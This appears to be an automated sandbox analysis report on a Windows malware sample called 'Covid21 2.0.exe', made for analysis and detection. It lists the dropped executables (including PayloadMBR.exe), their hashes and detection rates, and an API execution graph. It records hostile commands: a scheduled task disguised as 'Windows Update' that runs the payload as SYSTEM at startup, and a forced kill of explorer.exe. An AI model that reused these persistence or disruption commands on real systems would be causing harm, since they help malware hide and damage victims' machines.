                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe
                                Wow64 process (32bit):true
                                Commandline:z.exe
                                Imagebase:0x400000
                                File size:422029 bytes
                                MD5 hash:A7CE5BEE03C197F0A99427C4B590F4A0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 0%, Metadefender, Browse
                                • Detection: 7%, ReversingLabs

                                Chronological Activities

                                Analysis Process: wscript.exe PID: 744 Parent PID: 6616

                                General

                                Start time:15:53:32
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: timeout.exe PID: 768 Parent PID: 6616

                                General

                                Start time:15:53:32
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 5 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: mlt.exe PID: 6804 Parent PID: 6616

                                General

                                Start time:15:53:37
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exe
                                Wow64 process (32bit):false
                                Commandline:mlt.exe
                                Imagebase:0x400000
                                File size:133205 bytes
                                MD5 hash:A4E26D32F9655DBE8EFD276A530EB02B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: wscript.exe PID: 3136 Parent PID: 6616

                                General

                                Start time:15:53:38
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: timeout.exe PID: 1376 Parent PID: 6616

                                General

                                Start time:15:53:38
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 5 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: wscript.exe PID: 5972 Parent PID: 6616

                                General

                                Start time:15:53:43
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: icons.exe PID: 6056 Parent PID: 6616

                                General

                                Start time:15:53:43
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe
                                Wow64 process (32bit):true
                                Commandline:icons.exe
                                Imagebase:0x400000
                                File size:107828 bytes
                                MD5 hash:3CA1D5768C2944D4284B1541653823C7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 13%, ReversingLabs

                                Chronological Activities

                                Analysis Process: timeout.exe PID: 7052 Parent PID: 6616

                                General

                                Start time:15:53:44
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 5 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 7060 Parent PID: 6056

                                General

                                Start time:15:53:44
                                Start date:28/03/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff724c50000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: screenscrew.exe PID: 5600 Parent PID: 6616

                                General

                                Start time:15:53:49
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe
                                Wow64 process (32bit):true
                                Commandline:screenscrew.exe
                                Imagebase:0x400000
                                File size:113664 bytes
                                MD5 hash:E87A04C270F98BB6B5677CC789D1AD1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Antivirus matches:
                                • Detection: 36%, Metadefender, Browse
                                • Detection: 62%, ReversingLabs

                                Chronological Activities

                                Analysis Process: wscript.exe PID: 7080 Parent PID: 6616

                                General

                                Start time:15:53:49
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: timeout.exe PID: 5672 Parent PID: 6616

                                General

                                Start time:15:53:50
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 5 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: wscript.exe PID: 6932 Parent PID: 6616

                                General

                                Start time:15:53:55
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\t.vbs'
                                Imagebase:0x2f0000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: timeout.exe PID: 3912 Parent PID: 6616

                                General

                                Start time:15:53:56
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 3 /nobreak
                                Imagebase:0x260000
                                File size:26112 bytes
                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: taskkill.exe PID: 6160 Parent PID: 6616

                                General

                                Start time:15:54:00
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\taskkill.exe
                                Wow64 process (32bit):true
                                Commandline:taskkill /f /im explorer.exe
                                Imagebase:0x8c0000
                                File size:74752 bytes
                                MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: PayloadMBR.exe PID: 4112 Parent PID: 6616

                                General

                                Start time:15:54:01
                                Start date:28/03/2021
                                Path:C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe
                                Wow64 process (32bit):true
                                Commandline:PayloadMBR.exe
                                Imagebase:0x400000
                                File size:103424 bytes
                                MD5 hash:D917AF256A1D20B4EAC477CDB189367B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 82%, ReversingLabs

                                Chronological Activities

                                Analysis Process: schtasks.exe PID: 4248 Parent PID: 4112

                                General

                                Start time:15:54:01
                                Start date:28/03/2021
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks.exe /Create /TN 'Windows Update' /ru SYSTEM /SC ONSTART /TR 'C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe'
                                Imagebase:0x3f0000
                                File size:185856 bytes
                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Analysis Process: conhost.exe PID: 4228 Parent PID: 4248

                                General

                                Start time:15:54:01
                                Start date:28/03/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff724c50000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Chronological Activities

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Analysis Process: Covid21 2.0.exe PID: 6564 Parent PID: 6032 Covid21 2.0.exeCOMMON

                                  Execution Graph

                                  Execution Coverage:4.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:5.1%
                                  Total number of Nodes:792
                                  Total number of Limit Nodes:3

                                  Graph

                                  execution_graph 12265 401bd0 12272 403b0b 12265->12272 12269 401bda 12279 404a13 12269->12279 12271 401be9 12273 403ad4 12272->12273 12274 403aeb 12273->12274 12275 403add CloseHandle 12273->12275 12276 403af4 HeapFree 12274->12276 12277 401bd5 12274->12277 12275->12274 12276->12277 12278 403cc0 SetUnhandledExceptionFilter 12277->12278 12278->12269 12280 404a23 12279->12280 12281 404a4d 12280->12281 12286 404925 12280->12286 12283 404a7b 12281->12283 12284 404a62 HeapFree 12281->12284 12285 404a6d HeapFree 12281->12285 12283->12271 12284->12285 12285->12283 12287 40493d 12286->12287 12288 404947 GetWindow 12287->12288 12289 404a0e 12287->12289 12290 404962 RemovePropA RemovePropA 12288->12290 12291 404955 12288->12291 12289->12280 12293 404980 RevokeDragDrop 12290->12293 12294 404988 12290->12294 12291->12290 12292 40495b SetActiveWindow 12291->12292 12292->12290 12293->12294 12295 4049a1 sprintf UnregisterClassA 12294->12295 12296 40498f SendMessageA 12294->12296 12297 4049d3 12295->12297 12296->12297 12299 4049f2 12297->12299 12300 4049da HeapFree DestroyAcceleratorTable 12297->12300 12301 404a00 12299->12301 12302 4049f9 DeleteObject 12299->12302 12300->12299 12304 4066bb 12301->12304 12302->12301 12305 4066e2 12304->12305 12306 4066c7 12304->12306 12310 40681d 12305->12310 12306->12305 12307 4066cc memset 12306->12307 12309 4066ec 12307->12309 12309->12289 12311 40682e HeapFree 12310->12311 12311->12309 12313 401000 memset GetModuleHandleA HeapCreate 12314 401044 12313->12314 12585 407470 HeapCreate RtlAllocateHeap 12314->12585 12316 401049 12586 406807 HeapCreate 12316->12586 12318 40104e 12587 406040 12318->12587 12326 401062 12605 40393b 12326->12605 12328 401067 12608 403694 6FA4DB20 CoInitialize 12328->12608 12330 40106c 12609 403ef0 RtlAllocateHeap 12330->12609 12338 4010bf GetUserDefaultLangID VerLanguageNameA CharLowerA 12622 403de0 12338->12622 12340 4010fc 12626 4030f0 12340->12626 12344 401113 12345 40112a 12344->12345 12346 4011ff 12344->12346 12805 403108 12345->12805 12347 403108 4 API calls 12346->12347 12349 40120f 12347->12349 12351 403108 4 API calls 12349->12351 12353 40121f 12351->12353 12352 403108 4 API calls 12354 40114a 12352->12354 12355 403108 4 API calls 12353->12355 12356 403108 4 API calls 12354->12356 12357 40122f 12355->12357 12358 40115a 12356->12358 12359 403108 4 API calls 12357->12359 12360 403108 4 API calls 12358->12360 12361 40123f 12359->12361 12362 40116a 12360->12362 12364 403108 4 API calls 12361->12364 12363 403108 4 API calls 12362->12363 12365 40117a 12363->12365 12366 40124f 12364->12366 12367 403108 4 API calls 12365->12367 12368 403108 4 API calls 12366->12368 12369 40118a 12367->12369 12370 40125f 12368->12370 12371 403108 4 API calls 12369->12371 12372 403108 4 API calls 12370->12372 12374 40119a 12371->12374 12373 40126f 12372->12373 12375 403108 4 API calls 12373->12375 12376 403108 4 API calls 12374->12376 12377 40127f 12375->12377 12378 4011aa 12376->12378 12379 403108 4 API calls 12377->12379 12380 403108 4 API calls 12378->12380 12381 40128f 12379->12381 12382 4011ba 12380->12382 12383 403108 4 API calls 12381->12383 12384 403108 4 API calls 12382->12384 12385 40129f 12383->12385 12386 4011ca 12384->12386 12387 403108 4 API calls 12385->12387 12388 403108 4 API calls 12386->12388 12389 4012af 12387->12389 12390 4011da 12388->12390 12391 403108 4 API calls 12389->12391 12392 403108 4 API calls 12390->12392 12393 4012bf 12391->12393 12394 4011ea 12392->12394 12396 403108 4 API calls 12393->12396 12395 403108 4 API calls 12394->12395 12397 4011fa 12395->12397 12396->12397 12630 403cd7 GetVersionExA 12397->12630 12400 4012f6 12635 403b70 12400->12635 12401 4012db 12808 4036a2 12401->12808 12404 401302 12641 403a66 12404->12641 12406 401bbb ExitProcess HeapDestroy ExitProcess 12408 4013a1 12645 4020c9 12408->12645 12412 4013b5 12652 401bf4 12412->12652 12413 4013cc 12415 4036a2 16 API calls 12413->12415 12416 4012f1 12415->12416 12416->12406 12417 4030f0 RtlAllocateHeap RtlReAllocateHeap 12427 401325 12417->12427 12419 4020c9 6 API calls 12420 4013fc 12419->12420 12421 401400 12420->12421 12422 401426 12420->12422 12423 403de0 RtlReAllocateHeap 12421->12423 12424 4036a2 16 API calls 12422->12424 12426 401418 12423->12426 12424->12416 12425 4074f0 strlen RtlReAllocateHeap 12425->12427 12428 4030f0 2 API calls 12426->12428 12427->12408 12427->12417 12427->12425 12815 403a18 12427->12815 12429 401424 12428->12429 12430 4020c9 6 API calls 12429->12430 12431 401456 12430->12431 12432 40147a 12431->12432 12433 40145a 12431->12433 12434 4036a2 16 API calls 12432->12434 12435 4020c9 6 API calls 12433->12435 12434->12416 12436 4014aa 12435->12436 12437 4020c9 6 API calls 12436->12437 12438 4014dc 12437->12438 12439 4020c9 6 API calls 12438->12439 12440 40150e 12439->12440 12441 40176d 12440->12441 12821 404de6 12440->12821 12442 403de0 RtlReAllocateHeap 12441->12442 12445 401785 12442->12445 12447 4030f0 2 API calls 12445->12447 12449 401791 12447->12449 12451 403de0 RtlReAllocateHeap 12449->12451 12453 4017a9 12451->12453 12454 4030f0 2 API calls 12453->12454 12456 4017b5 12454->12456 12458 4020c9 6 API calls 12456->12458 12460 4017c5 12458->12460 12462 401a3c 12460->12462 12464 403a18 3 API calls 12460->12464 12685 4074f0 12462->12685 12466 4017de 12464->12466 12469 403de0 RtlReAllocateHeap 12466->12469 12467 401a4d 12470 4074f0 2 API calls 12467->12470 12475 4017fc 12469->12475 12471 401a57 12470->12471 12473 4074f0 2 API calls 12471->12473 12472 4015dc _rmdir 12472->12406 12474 401a62 12473->12474 12477 4030f0 2 API calls 12474->12477 12475->12462 12483 401833 12475->12483 12476 4015cc 12476->12472 12479 401613 12476->12479 12482 40165c 12476->12482 12852 40505e 12476->12852 12478 401a6e 12477->12478 12689 406170 12478->12689 12855 4045fc 12479->12855 12487 4045fc 4 API calls 12482->12487 12902 405dd5 12483->12902 12485 401a7e 12490 401a82 12485->12490 12491 401a9e 12485->12491 12486 401624 12492 4030f0 2 API calls 12486->12492 12488 40166d 12487->12488 12493 4030f0 2 API calls 12488->12493 12489 401846 12906 4036f8 12489->12906 12699 406250 12490->12699 12497 405ea0 DeleteFileA 12491->12497 12496 401630 12492->12496 12498 401679 12493->12498 12501 404925 13 API calls 12496->12501 12502 401aa9 12497->12502 12503 404925 13 API calls 12498->12503 12499 401861 12504 4030f0 2 API calls 12499->12504 12500 401a92 12706 405fd0 12500->12706 12506 40163a 12501->12506 12507 40203d 6 API calls 12502->12507 12503->12506 12513 40186d 12504->12513 12508 40168f 12506->12508 12509 401aae 12507->12509 12861 406860 12508->12861 12510 4036a2 16 API calls 12509->12510 12511 401ac4 _rmdir 12510->12511 12511->12406 12512 401a9c 12516 401af6 12512->12516 12714 402130 12512->12714 12514 4019dd 12513->12514 12518 4074f0 2 API calls 12513->12518 12517 403a79 4 API calls 12514->12517 12522 4074f0 2 API calls 12516->12522 12521 4019f6 12517->12521 12523 401891 12518->12523 12525 405e15 2 API calls 12521->12525 12526 401b0d 12522->12526 12527 4030f0 2 API calls 12523->12527 12524 403de0 RtlReAllocateHeap 12528 4016cb 12524->12528 12529 401a0a 12525->12529 12530 4074f0 2 API calls 12526->12530 12541 40189d 12527->12541 12533 401714 12528->12533 12534 4016e6 12528->12534 12531 405e90 SetCurrentDirectoryA 12529->12531 12532 401b18 12530->12532 12535 401a1e _rmdir 12531->12535 12766 402779 12532->12766 12538 4020c9 6 API calls 12533->12538 12537 4036a2 16 API calls 12534->12537 12535->12406 12543 4016fc _rmdir 12537->12543 12545 401724 12538->12545 12540 4018b7 12928 406230 12540->12928 12541->12540 12542 402130 55 API calls 12541->12542 12542->12540 12543->12406 12867 401d57 12545->12867 12549 4019af 12553 406170 7 API calls 12549->12553 12552 405fd0 5 API calls 12555 4018d9 12552->12555 12556 4019bf 12553->12556 12559 4074f0 2 API calls 12555->12559 12556->12514 12562 406250 6 API calls 12556->12562 12558 401b68 12796 405e15 12558->12796 12561 4018f5 12559->12561 12564 4074f0 2 API calls 12561->12564 12565 4019d3 12562->12565 12568 4018ff 12564->12568 12566 405fd0 5 API calls 12565->12566 12566->12514 12570 4074f0 2 API calls 12568->12570 12571 40190a 12570->12571 12572 4074f0 2 API calls 12571->12572 12573 401914 12572->12573 12574 4074f0 2 API calls 12573->12574 12575 40191f 12574->12575 12576 4036a2 16 API calls 12575->12576 12577 40193a 12576->12577 12577->12549 12578 401950 12577->12578 12579 403a79 4 API calls 12578->12579 12580 401969 12579->12580 12581 405e15 2 API calls 12580->12581 12582 40197d 12581->12582 12583 405e90 SetCurrentDirectoryA 12582->12583 12584 401991 _rmdir 12583->12584 12584->12406 12585->12316 12586->12318 12931 4066f1 RtlAllocateHeap RtlAllocateHeap 12587->12931 12589 401053 12590 404ab3 12589->12590 12932 4066f1 RtlAllocateHeap RtlAllocateHeap 12590->12932 12592 404ac1 12933 406434 RtlAllocateHeap 12592->12933 12595 405082 12596 406434 RtlAllocateHeap 12595->12596 12597 401058 12596->12597 12598 4040e0 RtlInitializeCriticalSection GetStockObject 12597->12598 12935 4066f1 RtlAllocateHeap RtlAllocateHeap 12598->12935 12600 40410b 12601 406434 RtlAllocateHeap 12600->12601 12602 404121 memset 12601->12602 12603 40105d 12602->12603 12604 403d90 HeapCreate 12603->12604 12604->12326 12606 406434 RtlAllocateHeap 12605->12606 12607 403946 RtlInitializeCriticalSection 12606->12607 12607->12328 12608->12330 12936 40645c RtlAllocateHeap 12609->12936 12612 403060 12613 403065 12612->12613 12614 4010a6 12612->12614 12616 403087 HeapFree 12613->12616 12938 403128 12613->12938 12617 4030a0 RtlAllocateHeap 12614->12617 12616->12614 12618 4010b5 12617->12618 12619 403dc0 12618->12619 12620 403dc8 RtlAllocateHeap 12619->12620 12621 403dda 12619->12621 12620->12338 12621->12338 12623 403dea 12622->12623 12942 407750 12623->12942 12625 403df7 12625->12340 12945 407580 12626->12945 12628 401108 12629 403e30 HeapFree 12628->12629 12629->12344 12631 403cfe 12630->12631 12632 4012d4 12630->12632 12631->12632 12633 403d18 GetVersionExA 12631->12633 12632->12400 12632->12401 12633->12632 12634 403d32 12633->12634 12634->12632 12636 403b90 12635->12636 12637 403b98 12636->12637 12638 403bba SetUnhandledExceptionFilter 12636->12638 12639 403ba1 SetUnhandledExceptionFilter 12637->12639 12640 403bab SetUnhandledExceptionFilter 12637->12640 12638->12404 12639->12640 12640->12404 12642 403a71 12641->12642 12949 403957 12642->12949 12954 403100 12645->12954 12648 4020f6 LoadResource SizeofResource 12649 40211a 12648->12649 12957 407550 12649->12957 12653 403dc0 RtlAllocateHeap 12652->12653 12654 401c04 12653->12654 12963 405eb2 12654->12963 12656 401c13 12657 4030f0 2 API calls 12656->12657 12658 401c1d GetTempFileNameA 12657->12658 12970 403e50 12658->12970 12661 4030f0 2 API calls 12662 401c4f 12661->12662 12976 403e30 HeapFree 12662->12976 12664 401c57 12665 405ea0 DeleteFileA 12664->12665 12666 401c62 12665->12666 12977 405f13 12666->12977 12669 405dd5 2 API calls 12670 401c79 12669->12670 12671 4030f0 2 API calls 12670->12671 12672 401c85 12671->12672 12673 401cdb 12672->12673 12675 401cf8 12672->12675 12677 4074f0 2 API calls 12672->12677 12674 4074f0 2 API calls 12673->12674 12676 401cec 12674->12676 12680 407550 HeapFree 12675->12680 12678 4030f0 2 API calls 12676->12678 12679 401cc4 12677->12679 12678->12675 12681 4074f0 2 API calls 12679->12681 12682 4013ca 12680->12682 12683 401ccf 12681->12683 12682->12419 12684 4030f0 2 API calls 12683->12684 12684->12673 12686 4074ff strlen 12685->12686 12688 40751e 12685->12688 12687 407750 RtlReAllocateHeap 12686->12687 12687->12688 12688->12467 12982 40662c 12689->12982 12692 4061c6 12694 406211 12692->12694 12695 4061ca RtlAllocateHeap 12692->12695 12693 4061ad CreateFileA 12693->12692 12693->12694 12697 406224 12694->12697 12698 4066bb 2 API calls 12694->12698 12696 4061ff 12695->12696 12696->12485 12697->12485 12698->12697 12700 406260 12699->12700 12701 406298 12699->12701 12700->12701 12702 4062a0 12700->12702 12703 406285 12700->12703 12701->12500 12702->12702 12704 4062a9 WriteFile 12702->12704 12703->12703 12990 406330 12703->12990 12704->12500 12707 405fda 12706->12707 12708 406022 12706->12708 12707->12708 12709 405ff3 12707->12709 12710 40600c CloseHandle 12707->12710 12708->12512 12711 405f90 WriteFile 12709->12711 12712 4066bb 2 API calls 12710->12712 12713 405ff9 HeapFree 12711->12713 12712->12708 12713->12710 12715 402137 12714->12715 12715->12715 12716 403100 2 API calls 12715->12716 12717 402150 12716->12717 12718 405e90 SetCurrentDirectoryA 12717->12718 12721 402163 12718->12721 12720 4074f0 2 API calls 12720->12721 12721->12720 12724 4030f0 RtlAllocateHeap RtlReAllocateHeap 12721->12724 12763 4021ea 12721->12763 13004 403220 12721->13004 12722 4023bb 13031 4035d0 12722->13031 12724->12721 12727 406230 9 API calls 12727->12763 12728 4023f1 12729 4022f1 12728->12729 12732 4074f0 2 API calls 12728->12732 12734 407550 HeapFree 12729->12734 12730 405fd0 5 API calls 12730->12763 12731 406170 7 API calls 12731->12763 12733 40242d 12732->12733 12735 4074f0 2 API calls 12733->12735 12736 40249d 12734->12736 12738 402437 12735->12738 12739 407550 HeapFree 12736->12739 12740 4074f0 2 API calls 12738->12740 12741 4024a6 12739->12741 12743 402440 12740->12743 12744 407550 HeapFree 12741->12744 12742 405fd0 5 API calls 12756 40230a 12742->12756 12746 4074f0 2 API calls 12743->12746 12747 4024af 12744->12747 12745 4074f0 strlen RtlReAllocateHeap 12745->12763 12749 40244a 12746->12749 12750 407550 HeapFree 12747->12750 12751 4074f0 2 API calls 12749->12751 12752 4024b8 12750->12752 12755 402455 12751->12755 12752->12516 12753 4030f0 RtlAllocateHeap RtlReAllocateHeap 12753->12763 12754 4074f0 2 API calls 12754->12756 12757 4036a2 16 API calls 12755->12757 12756->12742 12756->12754 12758 4030f0 2 API calls 12756->12758 12756->12763 13012 4062d0 12756->13012 13019 403fa3 12756->13019 13023 406960 12756->13023 12759 402470 12757->12759 12758->12756 12759->12729 12762 40203d 6 API calls 12759->12762 12760 4036a2 16 API calls 12760->12763 12762->12729 12763->12722 12763->12727 12763->12730 12763->12731 12763->12745 12763->12753 12763->12756 12763->12760 12764 4022ec 12763->12764 12765 40203d 6 API calls 12764->12765 12765->12729 12767 402780 12766->12767 12767->12767 12768 403100 2 API calls 12767->12768 12769 402799 12768->12769 12770 403100 2 API calls 12769->12770 12771 4027a6 12770->12771 12772 403100 2 API calls 12771->12772 12773 4027b3 ShellExecuteEx 12772->12773 12774 4027fa Sleep GetExitCodeProcess 12773->12774 12775 402819 12774->12775 12775->12774 12776 402825 12775->12776 12777 407550 HeapFree 12776->12777 12778 40283a 12777->12778 12779 407550 HeapFree 12778->12779 12780 402843 12779->12780 12781 407550 HeapFree 12780->12781 12782 401b39 12781->12782 12783 40203d 12782->12783 12784 401b44 12783->12784 12786 40204a 12783->12786 12788 405ea0 12784->12788 12785 406960 5 API calls 12785->12786 12786->12784 12786->12785 12787 405ea0 DeleteFileA 12786->12787 12787->12786 12789 405ea7 DeleteFileA 12788->12789 12790 401b4f 12788->12790 12789->12790 12791 403a79 12790->12791 12792 407750 RtlReAllocateHeap 12791->12792 12793 403a8b GetModuleFileNameA strcmp 12792->12793 12794 403ac2 12793->12794 12795 403aae memmove 12793->12795 12794->12558 12795->12794 12799 405e25 12796->12799 12797 407750 RtlReAllocateHeap 12798 405e62 12797->12798 12800 401b7c 12798->12800 12801 405e76 strncpy 12798->12801 12799->12797 12802 405e90 12800->12802 12801->12800 12803 405e97 SetCurrentDirectoryA 12802->12803 12804 401b90 _rmdir 12802->12804 12803->12804 12804->12406 13051 407650 12805->13051 12807 40113a 12807->12352 13058 4038b5 12808->13058 12813 4038b5 12 API calls 12814 4036cb 12813->12814 12814->12416 12816 403a2b 12815->12816 12817 403957 GetCommandLineA 12816->12817 12818 403a40 12817->12818 12819 407750 RtlReAllocateHeap 12818->12819 12820 403a4e strncpy 12819->12820 12820->12427 13076 404b03 12821->13076 12824 4042bd 13114 4041cf 12824->13114 12827 4043ae 12828 4043bf 12827->12828 12829 404422 CreateWindowExA 12828->12829 12830 4043cf memset 12828->12830 12832 404472 12829->12832 12836 40158b 12829->12836 12830->12829 12833 40662c 2 API calls 12832->12833 12834 404480 SetWindowLongA 12833->12834 12835 4047bb 4 API calls 12834->12835 12835->12836 12837 4045b3 12836->12837 13128 4044f0 12837->13128 12840 404e09 12842 404e23 12840->12842 12841 4015c2 12848 4045d3 12841->12848 12842->12841 12843 404eb2 RtlReAllocateHeap 12842->12843 12844 404e8f RtlAllocateHeap 12842->12844 12845 404ea1 12842->12845 12843->12845 12844->12845 12846 404f06 DestroyAcceleratorTable 12845->12846 12847 404f0d CreateAcceleratorTableA 12845->12847 12846->12847 12847->12841 12850 4045da 12848->12850 12849 4045f3 SetFocus 12851 4045f9 12849->12851 12850->12849 12850->12851 12851->12476 13138 404f24 12852->13138 12856 40460c 12855->12856 12857 40461c 12856->12857 12858 404625 GetWindowTextLengthA 12856->12858 12857->12486 12859 407750 RtlReAllocateHeap 12858->12859 12860 40463b GetWindowTextA strlen 12859->12860 12860->12857 12862 40686d 12861->12862 13164 4073b0 12862->13164 12864 406890 12865 407750 RtlReAllocateHeap 12864->12865 12866 4016ad 12865->12866 12866->12524 12868 401d5f 12867->12868 12868->12868 12869 403100 2 API calls 12868->12869 12870 401d78 12869->12870 13167 403110 12870->13167 12873 4030a0 RtlAllocateHeap 12874 401d9f 12873->12874 12875 403110 HeapFree 12874->12875 12876 401db7 12875->12876 12877 4030a0 RtlAllocateHeap 12876->12877 12878 401dc6 12877->12878 12879 403110 HeapFree 12878->12879 12880 401dde 12879->12880 12881 4030a0 RtlAllocateHeap 12880->12881 12882 401ded 12881->12882 13170 4024c0 12882->13170 12885 4024c0 5 API calls 12886 401e11 12885->12886 12887 4024c0 5 API calls 12886->12887 12900 401e25 12887->12900 12888 401fa9 12889 407550 HeapFree 12888->12889 12890 402017 12889->12890 12891 403110 HeapFree 12890->12891 12892 402021 12891->12892 12893 403110 HeapFree 12892->12893 12894 40202a 12893->12894 12896 403110 HeapFree 12894->12896 12895 403dc0 RtlAllocateHeap 12895->12900 12897 402033 12896->12897 12897->12441 12898 401f72 _rmdir 12899 4036a2 16 API calls 12898->12899 12899->12900 12900->12888 12900->12895 12900->12898 13188 403ec0 12900->13188 12903 407750 RtlReAllocateHeap 12902->12903 12904 405de7 GetCurrentDirectoryA 12903->12904 12905 405df7 12904->12905 12905->12489 12907 40370d CoInitialize 12906->12907 12908 40371e memset LoadLibraryA 12906->12908 12907->12908 12909 403834 12908->12909 12910 403748 strncpy strlen 12908->12910 12912 407750 RtlReAllocateHeap 12909->12912 12913 40378d GetProcAddress 12910->12913 12914 40377f 12910->12914 12916 40383d 12912->12916 12915 40390d 3 API calls 12913->12915 12914->12913 12917 4037ac 12915->12917 12916->12499 12918 4038b5 12 API calls 12917->12918 12919 4037cd 12918->12919 12920 4038b5 12 API calls 12919->12920 12921 4037de 12920->12921 12922 4037e3 GetProcAddress 12921->12922 12923 403826 FreeLibrary 12921->12923 12924 407750 RtlReAllocateHeap 12922->12924 12923->12909 12923->12916 12925 4037f8 strlen 12924->12925 12925->12923 12927 40381e 12925->12927 12927->12923 13195 406060 12928->13195 12930 4018c7 12930->12549 12930->12552 12931->12589 12932->12592 12934 404ad4 LoadIconA LoadCursorA 12933->12934 12934->12595 12935->12600 12937 401087 12936->12937 